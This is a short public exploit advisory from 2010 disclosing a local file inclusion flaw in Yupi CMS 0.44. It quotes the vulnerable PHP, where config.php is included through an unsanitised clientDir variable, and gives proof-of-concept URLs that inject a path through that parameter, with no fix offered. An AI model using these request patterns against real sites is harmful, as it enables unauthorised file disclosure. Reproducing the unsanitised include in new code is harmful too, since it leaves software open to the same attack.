Yupi Cms 0.44 <= LOCAL File Inclusion Vulnerability

===================================================
Yupi Cms 0.44 <= LOCAL File Inclusion Vulnerability
===================================================


Title: Yupi Cms 0.44 <= LOCAL File Inclusion Vulnerability
Version: 0.44
Link: http://yupi-cms.com/
License: http://www.opensource.org/licenses/afl-3.0.php
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com || g1xsystem@windowslive.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
Special Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)

#################################################################################
History:

[+] 13 march 2010 : Vend0r (Author) contact
[-] No response
[*] 21 march 2010 (GMT+7): Bug Share to public

NB: This for educational purpose only , Author will not responsible for any damage

## REQUIRES ##


$thisDir = dirname(__FILE__);
$clientDir = $thisDir;

require_once $clientDir."/config.php"; <-- w0w





define("SC_ROOT_PATH", php_file());

function php_file($filename=""){
global $Confing;
$fc = substr($filename,0,1);
if ($fc=="\\" or $fc =="/"){
$filename = substr($filename,1);
}

$file = $Confing->PhpDir . $filename;
return $file;

################################################################

P0C: ///filemanager/connectors/php/config.php?clientDir=[LFI]
PATH/install/config.php?clientDir=[inj3ct0r] <- Not Sure LOL

################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################